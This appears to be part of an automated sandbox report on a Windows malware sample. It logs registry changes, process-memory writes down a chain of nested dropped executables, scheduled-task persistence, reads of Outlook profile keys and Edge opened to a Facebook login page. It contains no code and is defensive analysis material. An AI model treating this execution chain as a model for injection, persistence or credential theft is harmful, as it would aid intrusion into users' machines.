Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DA56.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\138F.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GC37H.tmp\LzmwAqmV.tmp N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3320 wrote to memory of 3056 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\D561.exe
PID 3320 wrote to memory of 3056 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\D561.exe
PID 3320 wrote to memory of 3056 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\D561.exe
PID 3320 wrote to memory of 4436 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\D61D.exe
PID 3320 wrote to memory of 4436 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\D61D.exe
PID 3320 wrote to memory of 4436 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\D61D.exe
PID 3056 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\D561.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe
PID 3056 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\D561.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe
PID 3056 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\D561.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe
PID 448 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe
PID 448 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe
PID 448 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe
PID 1720 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe
PID 1720 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe
PID 1720 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe
PID 3320 wrote to memory of 2408 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3320 wrote to memory of 2408 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2928 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe
PID 2928 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe
PID 2928 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe
PID 3604 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe
PID 3604 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe
PID 3604 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe
PID 3320 wrote to memory of 2100 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\D9D8.exe
PID 3320 wrote to memory of 2100 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\D9D8.exe
PID 3320 wrote to memory of 2100 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\D9D8.exe
PID 3320 wrote to memory of 4812 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\DA56.exe
PID 3320 wrote to memory of 4812 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\DA56.exe
PID 3320 wrote to memory of 4812 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\DA56.exe
PID 3320 wrote to memory of 2768 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\DB23.exe
PID 3320 wrote to memory of 2768 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\DB23.exe
PID 3320 wrote to memory of 2768 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\DB23.exe
PID 2408 wrote to memory of 4564 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2408 wrote to memory of 4564 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3320 wrote to memory of 552 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\DD37.exe
PID 3320 wrote to memory of 552 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\DD37.exe
PID 3320 wrote to memory of 552 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\DD37.exe
PID 2768 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\DB23.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 2768 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\DB23.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 2768 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\DB23.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 4564 wrote to memory of 3048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4564 wrote to memory of 3048 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4300 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4300 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4300 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4300 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4300 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4300 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4300 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4300 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4300 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4300 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3604 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe
PID 3604 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe
PID 3604 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe
PID 1760 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 1760 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 1760 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 1760 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1760 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1760 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4564 wrote to memory of 4900 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4564 wrote to memory of 4900 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4564 wrote to memory of 4900 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F0A.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F0A.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe

"C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe"

C:\Users\Admin\AppData\Local\Temp\D561.exe

C:\Users\Admin\AppData\Local\Temp\D561.exe

C:\Users\Admin\AppData\Local\Temp\D61D.exe

C:\Users\Admin\AppData\Local\Temp\D61D.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D8AF.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe

C:\Users\Admin\AppData\Local\Temp\D9D8.exe

C:\Users\Admin\AppData\Local\Temp\D9D8.exe

C:\Users\Admin\AppData\Local\Temp\DA56.exe

C:\Users\Admin\AppData\Local\Temp\DA56.exe

C:\Users\Admin\AppData\Local\Temp\DB23.exe

C:\Users\Admin\AppData\Local\Temp\DB23.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

